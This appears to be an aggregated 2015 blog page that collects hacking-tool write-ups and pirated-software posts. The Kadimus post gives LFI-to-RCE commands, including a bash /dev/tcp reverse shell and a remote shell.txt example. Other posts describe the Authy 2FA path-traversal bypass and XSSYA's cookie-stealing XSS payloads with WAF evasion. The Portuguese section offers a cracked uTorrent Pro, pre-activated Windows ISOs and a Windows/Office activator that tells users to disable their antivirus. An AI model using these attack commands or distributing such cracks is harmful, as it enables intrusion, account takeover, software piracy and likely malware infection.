الثلاثاء، 31 مارس 2015

WIG - WebApp Information Gathering Tool To Identify Fingerprinting of CMS




wig - WebApp Information Gathering Tool To Identify Fingerprinting of CMS 

wig is a web application information gathering tool. Which can identify numerous Content Management Systems and other administrative applications. The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. 

This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum.

wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version.



wig features:

  •  CMS version detection by: check sums, string matching and extraction
  •  Lists detected package and platform versions such as asp.net, php, openssl, apache
  •  Detects JavaScript libraries
  •  Operation system fingerprinting by matching php, apache and other packages against a values in wig's database
  •  Checks for files of interest such as administrative login pages, readmes, etc
  •  Currently the wig's databases include 28,000 fingerprints
  •  Reuse information from previous runs (save the cache)
  •  Implement a verbose option
  •  Remove dependency on 'requests'
  •  Support for proxy
  •  Proper threading support
  •  Included check for known vulnerabilities


New Changes:

  • Added fingerprints for more CMS, OS, platforms
  • Improved and updated old fingerprints
  • Proxy support
  • List vulnerabilies associated with detected software version
  • Added detection of JavaScript libs
  • General site information (currently title, cookie, ip)
  • Removed requirement for 3rd party python libs (requests). Now only requires Python3
  • Improved verbose output
  • Added a cache
  • Improved structure of the output
  • Detection of generally interesting files (readme, backups, etc)
  • Implemented proper threading via thread pool


Requirements

wig is built with Python 3, and is therefore not compatible with Python 2.

How it works

The default behavior of wig is to identify a CMS, and exit after version detection of the CMS. This is done to limit the amount of traffic sent to the target server. This behavior can be overwritten by setting the '-a' flag, in which case wig will test all the known fingerprints.

As some configurations of applications do not use the default location for files and resources, it is possible to have wig fetch all the static resources it encounters during its scan.

This is done with the '-c' option. The '-m' option tests all fingerprints against all fetched URLs, which is helpful if the default location has been changed.

Help Screen

usage: wig.py [-h] [-l INPUT_FILE] [-n STOP_AFTER] [-a] [-m] [-u]
              [--no_cache_load] [--no_cache_save] [-N] [--verbosity]
              [--proxy PROXY] [-w OUTPUT_FILE]
              [url]

WebApp Information Gatherer

Positional arguments:
  url         The url to scan e.g. http://example.com

Optional arguments:
 -h, --help       show this help message and exit
-l INPUT_FILE    File with urls, one per line.
-n STOP_AFTER    Stop after this amount of CMSs have been detected. Default:                   1
  -a               Do not stop after the first CMS is detected
  -m               Try harder to find a match without making more                      requests
  -u               User-agent to use in the requests
  --no_cache_load  Do not load cached responses
  --no_cache_save  Do not save the cache for later use
  -N               Shortcut for --no_cache_load and --no_cache_save
  --verbosity, -v  Increase verbosity. Use multiple times for more                      info
  --proxy PROXY    Tunnel through a proxy (format: localhost:8080)
  -w OUTPUT_FILE   File to dump results into (JSON)

Example of run:

$ ./wig.py example.com

wig - WebApp Information Gatherer

Redirected to http://www.example.com. Continue? [Y|n]:

TITLE
--- HTML TITLE ---

IP
255.255.255.256


SOFTWARE                         VERSION                           CATEGORY
Drupal 7.28 | 7.29 | 7.30 | 7.31 | 7.32 CMS
ASP.NET 4.0.30319.18067 Platform
Microsoft-HTTPAPI 2.0 Platform
Microsoft-IIS 6.0 | 7.0 | 7.5 | 8.0 Platform
Microsoft Windows Server 2003 SP2 | 2008 | 2008 R2 | 2012 Operating System

SOFTWARE VULNERABILITIES LINK
Drupal 7.28 7 http://cvedetails.com/version/169265
Drupal 7.29 3 http://cvedetails.com/version/169917
Drupal 7.30 3 http://cvedetails.com/version/169916

DOMAIN TITLE IP
http://m.example.com:80 mobile site 255.255.255.257
http://download.example.com:443 other site 255.255.255.257

TOOL SOFTWARE LINK
CMSmap Drupal https://github.com/Dionach/CMSmap
droopescan Drupal https://github.com/droope/droopescan

URL NOTE CATEGORY
/login/ Test directory Interesting URL
/login/index_form.html ASP.NET detailed error Interesting URL
/robots.txt robots.txt index Interesting URL
/test/ Test directory Interesting URL
_______________________________________________________________________________
Time: 15.7 sec Urls: 351 Fingerprints: 30560

Call wig as a function

  •  from wig import wig
  •  w = wig(url='example.com')
  •  w.run()
  •  results = w.get_results()

Download


الأحد، 29 مارس 2015

Database Hacker's Handbook: Defending Database Servers FREE For Limited Time


The Database Hacker's Handbook: Defending Database Servers (a $50 value) FREE for a limited time!

Learn how to identify vulnerabilities, how attacks are carried out, and how to stop the carnage?

Primary Category: 
IT - Data Management

Long Description: 
Databases are the nerve center of our economy. Every piece of your personal information is stored there-medical records, bank accounts, employment history, pensions, car registrations, even your children's grades and what groceries you buy. Database attacks are potentially crippling-and relentless.

In The Database Hacker's Handbook, four of the world's top security experts teach you to break into and defend the seven most popular database servers. The bad guys already know all the information in this book.

You need to know it too

  • Identify and plug the new holes in Oracle and Microsoft(r) SQL Server
  • Learn the best defenses for IBM's DB2(r), PostgreSQL, Sybase ASE, and MySQL(r) servers
  • Discover how buffer overflow exploitation, privilege escalation through SQL, stored procedure or trigger abuse, and SQL injection enable hacker access
  • Recognize vulnerabilities peculiar to each database
  • Find out what the attackers already know

This book is published by Wiley

Downlod now

الأحد، 22 مارس 2015

Oops Google Chrome Tab Can Crash By Simple 13 Characters On MAC OS



Oops! Google Chrome Tab Can Crash By Simple 13 Characters On MAC OS

Windows, Safari and Android browsers are safe by this characters (appear to be in Assyrian). If your Chrome is crashing, just type chrome://crashes into your location bar and press Enter to view the list of crashes.


What steps will reproduce the problem?
1. Any page with

will crash the chrome tab on a Mac.

2. Just create any dummy page with the unicode characters, and the Mac Chrome tab will crash hard

What is the expected result?
Expect it not to crash

What happens instead?
It crashes

Bug reporter said,
"This is pretty serious. You could imagine someone spamming this message in hangouts/gmail and just straight-up force crashing all Mac Chrome browsers. Someone could post this on Facebook, and force-crash all Mac Chrome browers that saw it."

You can check Bug details here.

Warning: Open it as your own risk. If you are using chrome on Mac, then it might be crashed.

This Bug is not fixed yet. We hope Google will be fixed this bug by next update.

السبت، 21 مارس 2015

Kadimus For LFI / RFI Scan And Exploit Tool


Kadimus For LFI / RFI Scan And Exploit Tool

Compile:

Installing libcurl:

CentOS/Fedora
# yum install libcurl-devel

Debian based
# apt-get install libcurl4-openssl-dev

Installing libpcre:

CentOS/Fedora
# yum install libpcre-devel

Debian based
# apt-get install libpcre3-dev

Installing libssh:

CentOS/Fedora
# yum install libssh-devel

Debian based
# apt-get install libssh-dev

And finally:
$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make

Options:
  -h, --help                    Display this help menu

  Request:
   -B, --cookie STRING         Set custom HTTP Cookie header
   -A, --user-agent STRING     User-Agent to send to server
   --connect-timeout SECONDS   Maximum time allowed for connection
 --retry-times NUMBER        number of times to retry if connection fails

  Scanner:
    -u, --url STRING             Single URI to scan
    -U, --url-list FILE         File contains URIs to scan
    -o, --output FILE           File to save output results
    --threads NUMBER                      Number of threads (2..1000)

  Explotation:
    -t, --target STRING         Vulnerable Target to exploit
    --injec-at STRING           Parameter name to inject exploit
                                                  (only need with RCE data and source disclosure)
 
RCE:
    
 -X, --rce-technique=TECH    LFI to RCE technique to use
   -C, --code STRING           Custom PHP code to execute, with php brackets
   -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                       Simple command shell interface through HTTP Request

   -r, --reverse-shell         Try spawn a reverse shell connection.
  -l, --listen NUMBER         port to listen

   -b, --bind-shell              Try connect to a bind-shell
    -i, --connect-to STRING            Ip/Hostname to connect
    -p, --port NUMBER           Port number to connect

   --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)
   --ssh-target STRING      Set the SSH Host (Default: Target URI hostname)


RCE Available techniques

      environ         Try run PHP Code using /proc/self/environ
      input             Try run PHP Code using php://input
      auth               Try run PHP Code using /var/log/auth.log
      data               Try run PHP Code using data://text


Source Disclosure:
      -G, --get-source          Try get the source files using filter://
   -f, --filename STRING     Set filename to grab source [REQUIRED]
   -O FILE                   Set output file (Default: stdout)

Examples:

Scanning:
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Get source code of file:

./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg

Execute php code:

./kadimus -t localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -X input

Execute command:

./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Checking for RFI:

You can also check for RFI errors, just put the remote url on resource/common_files.txt and the regex to identify this, example:

/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

in file:


http://bad-url.com/shell.txt?:scorpion say get over here

Reverse shell:


./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0

Download now

الأربعاء، 18 مارس 2015

How to fix Spotlight issues for MAC OS




MAC spotlight issues fix
MAC spotlight issues fix



How to fix MAC OSX Spotlight indexing issues: Leopard, Mavericks, un tested on Yosemite.




- Please leave a comment below if this resolves your issue on Yosemite!


















Spotlight “Indexing and searching disabled.” message in terminal on OSX


-          “Spot light doesn't pull anything up”




Fix:


-          Show hidden folders.


o   Open Terminal (Go > Utilities > Terminal)


o   Type the command: defaults write com.apple.finder AppleShowAllFiles Yes\


o   Enter the local MAC Admin password (Usually the users password)


-          Open Mac HDD (Go > Computer > Local HDD)


o   Locate the file called: .metadataneverindex and move it to trash (Right click > Move to trash)


-          Go back to terminal and run the following command


o   Sudo mdutil –I on /


-          Spot light should be indexing now, if there are any further indexing try to rebuild:


o   sudo mdutil -i off /


o   sudo rm -rf /.Spotlight*


o   sudo mdutil -i on /


o   sudo mdutil -E /

How To Bypass Two Step Verification Code



How To Bypass Two Step Verification Code? 

Now 2 step authentication are not safe, you guys will shock but its true. The attacker types ../sms in the SMS token field.

Sakurity researchers found the way to bypass the Authy 2 factor Authentication.

Here the details: 

>> The client app encodes it as ..%2fsms and makes an API call to Authy - https://api.authy.com/protected/json/verify/..%2fsms/authy_id

>> Path_traversal middleware decodes path to https://api.authy.com/protected/json/verify/../sms/authy_id,
splits by slashes and removes the directory in front of /...

>> Actual Authy API sees modified path https://api.authy.com/protected/json/sms/authy_id,
simply sends another SMS to authy_id (the victim) and responds with 200 status and {"success":true,"message":"SMS token was sent","cellphone":"+1-XXX-XXX-XX85"}

>> All Authy SDK libraries consider 200 status as a successful response and let the attacker in. Even a custom integration most likely will look for "success":true in the JSON body, and our /sms response body has it. So the only secure way to verify the response is to search for "token":"is valid" substring (which is what Authy libraries do now).

Yes, the attacker was able to bypass 2 factor authentication on any website using Authy with something as simple as "../sms" in the token field!

Source: Sakurati

الثلاثاء، 17 مارس 2015

How Your Phone Can Help Eradicate Business Threats Mobile Security Management


How Your Phone Can Help Eradicate Business Threats Mobile Security Management ?

#Free WhitePaper: "The Case for Mobile Security Management"

Since embezzlement and internal theft are leading causes of mid-sized business failure, making sure your company is secure on the inside isn't paranoia – it's smart business.

Learn how you can implement simpler security measures with the convenience of your smartphone or tablet. Like never before, you can maximize your most precious non-renewable resource: your time. Give yourself one less thing to worry about and learn how to safeguard your business with your fingertips.

Offered Free by: Tyco Integrated Security

Download Free

الأحد، 15 مارس 2015

FIR (Fast Incident Response) Management Platform For Cyber Security Incident




FIR (Fast Incident Response) Management Platform For Cyber Security Incident.

What is FIR? Who is it for?
FIR (Fast Incident Response) is an opensource cybersecurity incident management platform designed with agility and speed in mind. It allows for easy creation, tracking, and reporting of cybersecurity incidents.

FIR is for anyone needing to track cybersecurity incidents (CSIRTs, CERTs, SOCs, etc.). It's was tailored to suit our needs and our team's habits, but we put a great deal of effort into making it as generic as possible before releasing it so that other teams around the world may also use it and customize it as they see fit.



Installation
There are two ways to install FIR. If you want to take it for a test-drive, just follow the instructions for setting up a development environment in the Wiki.

If you like it and want to set it up for production, here's how to do it.



Technical specs
FIR is written in Python (but you probably already knew that), using Django 1.7.6. It uses Bootstrap 3 and some Ajax and d3js to make it pretty. We use it with a MySQL back-end, but feel free to use any other DB adaptor you might want - as long as it's compatible with Django, you shouldn't run into any major issues.

FIR is not greedy performance-wise. It will run smoothly on a Ubuntu 14.04 virtual machine with 1 core, a 40 GB disk and 1 GB RAM.

  • Roadmap
  • Nested Todos
  • REST API
  • Mailman

Download Now

الخميس، 12 مارس 2015

#Breaking: Twitter is Going To Suspend Wikileaks Official Account On World Day Against Cyber Censorship


#Breaking: Twitter is Going To Suspend Wikileaks Official Account On World Day Against Cyber Censorship.

What is World Day Against Cyber Censorship?

Its an online event held each year on the 12th of March to rally support for a single, unrestricted Internet that is accessible to all and to draw attention to the ways that governments around the world are deterring and censoring free speech online.

What's reason behind for twitter is going to suspend Wikileaks twitter account, Wikileaks tweeted.


الثلاثاء، 10 مارس 2015

XSSYA V-2.0 For Cross Site Scripting Vulnerability Confirmation Written In Python



XSSYA V-2.0-- (Cross Site Scripting Vulnerability Confirmation)

XSSYA Cross Site Scripting Scanner & Vulnerability Confirmation written in python scripting language confirm the XSS Vulnerability in two method first work by execute the payload encoded to bypass Web Application Firewall which is the first method  request and response if it respond 200 it turn to Method 2 which search that payload decoded in web page HTML code if it confirmed get the last step which is execute document.cookie to get the cookie.

• What have been changed?
 (XSSYA v 2.0 has more payloads; library contains 41 payloads to enhance detection level
XSS scanner is now removed from XSSYA to reduce false positive
 URLs to be tested used to not allow any character at the end of the URL except (/ - = -?) but now this limitation has been removed.



• What’s new in XSSYA V2.0? 
Custom Payload 1 – You have the ability to Choose your Custom Payload Ex: and you can encode your custom payload with different types of encodings like (B64 – HEX – URL_Encode – HEX with Semi Columns)

(HTML Entities à Single & Double Quote only - brackets – And – or Encode all payload with HTML Entities) This feature will support also XSS vulnerability confirmation method which is you choose you custom payload and custom Encoding execute if response 200 check for same payload decoded in HTM code page.

What’s more?
HTML5 Payloads XSYSA V2.0 contains a library of 44 HTLM5 payloads

XSSYA have a Library for the most vulnerable application with XSS – Cross site scripting and this library counting (Apache – WordPress – PHPmy Admin) If you choose apache application it give the CVE Number version of Apache which is affected and the link for CVE for more details so it will be easy to search for certain version that is affected with XSS

XSSYA has the feature to convert the IP address of the attacker to (Hex, Dword, Octal) to bypass any security mechanism or IPS that will be exist on the target Domain


XSSYA check is the target is Vulnerable to XST (Cross Site Trace) which it sends custom Trace Request and check if the target domain is Vulnerable the request will be like this:

TRACE / HTTP/1.0 
Host: demo.testfire.net 
Header1: < script >alert(document.cookie);



XSSYA Features

* Support HTTPS
* After Confirmation (execute payload to get cookies)
* Can be run in (Windows - Linux)
* Identify 3 types of WAF (Mod_Security - WebKnight - F5 BIG IP)
*XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall)
* Support Saving The Web HTML Code Before Executing
the Payload Viewing the Web HTML Code into the Screen or Terminal


More details:
http://labs.dts-solution.com/xssya-forget-the-browser-for-xss-by-yehia-mamdouh/

Download 
https://github.com/yehia-mamdouh/XSSYA-V-2.0

About The Author:
Yehia Mamdouh is Penetration Testing Specialist at Dts-solution & work as Senior Security Researcher at Defencely Freelancer. He is Cofounder & Instructor of Master Metasploit Course AtBlueKizen.
He is Holding (CCNA, CEH, VMware Data Center Virtualization, and Certified Canadian Academy Instructor) Trained in (Exploiting Web Applications with Samurai-WTF, Web Application Security,(OWASP)  and Cyber Crime Investigation (QCERT)) , He is Author of Many tools like WeBzY and XSSYA, He wrote numerous articles In Web attacks ,PDF forensics and Network attack  in Hakin9 Magazine, SecurityKaizen Magazine He also get BugHunter in his free time

الأربعاء، 4 مارس 2015

uTorrent Pro sem propagandas Crack e Serial



uTorrent Pro é a versão completa e paga do uTorrent, um dos clássicos para baixar e gerenciar arquivos torrent no PC. Um programa muito eficaz e com antivírus integrado para ter todos os torrents sob controle.

Graças ao tamanho reduzido, o uTorrent demora apenas uns instantes para arrancar. O software fica sempre disponível na bandeja do sistema, ao lado do relógio. Na primeira vez que você rodar o uTorrent, um assistente define de forma automática a melhor configuração para o seu computador.

Diferenças entre o uTorrent grátis e o uTorren
No essencial, o funcionamento do uTorrent Plus é muito parecido com o da versão gratuita do uTorrent. As diferenças estão nas funcionalidades avançadas, pois a versão paga converte arquivos e traz proteção contra vírus nos torrents.

A versão completa do programa permite ainda o acesso remoto aos seus arquivos e é compatível com mais formatos multimídia.

Baixe vários torrents simultaneamente, pare e retome downloads, limite a velocidade total ou de cada arquivo. uTorrent disponibiliza as ferramentas necessárias para você controlar todo o processo de download. Assim, fica mais fácil otimizar o funcionamento do computador e ganhar em velocidade e memória.

O uTorrent fala português e possui uma interface clara e agradável que pode ser personalizada com outros desenhos. É simples, leve, rápido, eficaz e grátis. Agora é só decidir se você prefere usar a versão completa ou continuar usando o velho e bom uTorrent grátis.

Prós
Antivírus integrado
Inclui conversor de formatos
Compatível com mais formatos



Atualizado Abril 2016
Tamanho: 4 mb



Download BR2Shared
Raton Shop
Raton Shop

Windows 8.1 AIO 32/64 2015 PT-BR


Versão atualizada 2015 do Windows 8.1 todas as versões

Todos Hotifix ate a data (05-01-2015).
Nenhum programa foi adicionado ao Windows.
Nenhum registro foi modificado.
Internet Explorer 11
Todas as versões são Pré-Ativadas
Tamanho: 5.94 GB
Formato: ISO
Facilidade de Uso: 10
Interface Gráfica: 10
Número de Mídias: 1 DVD Dual Layer ou Pen Drive 8GB
Idioma: Português

Tutorial como criar um Pen Drive com Windows Bootavel
Veja o vídeo explicado passo a passo :







Raton Shop



Download TORRENT




Raton Shop
Raton Shop

Windows 7 Black 2015 64Bits Torrent




Este é o original do Microsoft Windows 7 Ultimate SP1 (64-bit) Inglês ISO da Microsoft. Incluindo as atualizações da Microsoft até 2015/01/10 e Internet Explorer 11.



* .Microsoft .NET Framework 4.5.2 x86 Completo / x64
* Internet Explorer 11
* Hotfixes - 2015/01/10
* Windows carregador por Daz 2.2.2

INSTALAÇÃO
* Criar USB inicializável 2.0 (altamente recomendado), mínimo de 8 GB, com Rufus (em anexo) ou gravar em DVD + R em baixa velocidade.

Tamanho: 4,5 GB

_____________________________________
TRADUTOR:
Alterar o idioma do Windows 7

Vistalizator:
 Download Vistalizator:.


É um softwarepermite que você faça a tradução dos sistemas Windows Vista e Windows 7 (32 ou 64 bits) em menos de 5 minutos com a vantagem de poder
 utilizar todos os 36 language packs oficiais da Microsoft.

Download
  Download IDIOMA PORTUGUÊS BRASIL Windows 7 64 Bits:



O funcionamento é simples, você baixa o pacote de tradução normalmente, depois abre este software e adiciona o arquivo nele. Depois manda instalar e pronto!

Basta reiniciar o Windows .



Se preferir, tem o passo-a-passo com screenshots em :
TUTORIAL:

____________________________________

Raton Shop
OU
OU




Raton Shop
Raton Shop

Re-Loader Activator 1.2 Final



Este é um utilitário que ativa todas as versões do Windows e do Office 2010, Office 2013, Office 2015

As seguintes versões do Windows podem ser ativadas com este Ativador:

Windows XP
* Home Edition SP3
* Professional SP3
* Media Center Edition 2005 SP3

Windows Vista
* Enterprise
* EnterpriseN
* Business
* BusinessN
* Starter
* Home Basic
* Home BasicN
* Home Premium
* Ultimate

Windows 7
* Enterprise
* EnterpriseN
* EnterpriseE
* Starter
* Home Basic
* Home Premium
* Professional
* ProfessionalN
* Ultimate

Windows 8
* Enterprise
* EnterpriseN
* Core
* CoreN
* CoreARM
* CoreCountrySpecIFic
* CoreSingleLanguage
* Professional
* ProfessionalWMC
* ProfessionalN

Windows 8.1 Preview
* Enterprise
* EnterpriseN
* Core
* CoreN
* CoreARM
* CoreCountrySpecIFic
* CoreSingleLanguage
* Professional
* ProfessionalWMC
* ProfessionalN

Windows 8.1 RTM
* Enterprise
* EnterpriseN
* Professional
* ProfessionalN
* ProfessionalWMC
* Core
* CoreConnected
* CoreConnectedN
* CoreConnectedSingleLanguage
* CoreConnectedCountrySpecific
* ProfessionalStudent
* ProfessionalStudentN
* CoreARM
* CoreN
* CoreSingleLanguage
* CoreCountrySpecific
* EmbeddedIndustryA
* EmbeddedIndustryE
* EmbeddedIndustry

Windows 10 TP
* Enterprise
* Professional
* Server

Windows Server 2008
* ServerDatacenter
* ServerDatacenterV
* ServerEnterprise
* ServerEnterpriseV
* ServerEnterpriseIA64
* ServerStandard
* ServerStandardV
* ServerComputeCluster
* ServerWeb

Windows Server 2008 R2
* ServerDatacenter
* ServerEnterprise
* ServerEnterpriseIA64
* ServerStandard
* ServerEmbeddedSolution
* ServerHPC
* ServerWeb

Windows Server 2012
* ServerDatacenter
* ServerStandard
* ServerMultiPointPremium
* ServerMultiPointStandard

Windows Server 2012 R2
* ServerStandardCore
* ServerStandard
* ServerDatacenterCore
* ServerDatacenter
* SolutionCore
* Solution
* ServerCloudStorageCore
* ServerCloudStorage

-Office 2013
-Office 2010
-Office 2015

O Que Há De Novo:
* Antes da instalação da série, pare seu serviço de proteção(Antivirus), depois reinicie o pc.
* Atualizado Ra1nb0w, agora usam uma única classe para chamar funções.
* Corrigido um bug com a ativação de OEM Win7.
* Adicionado um patch para a ativação do WinXP.
* As edições de reconhecimento fixo do Office, agora o reconhecimento correto permite o melhor uso de WMI.
* Corrigido um bug que não permitia a tarefa de remoção corretamente.




Estilo: Ativador do Windows
Lançamento: 2015
Idiomas: Multi
Formato: RAR
Tamanho: 3.1 MB


Raton Shop
Download ATIVADOR ATUALIZADO 2016


Raton Shop
Raton Shop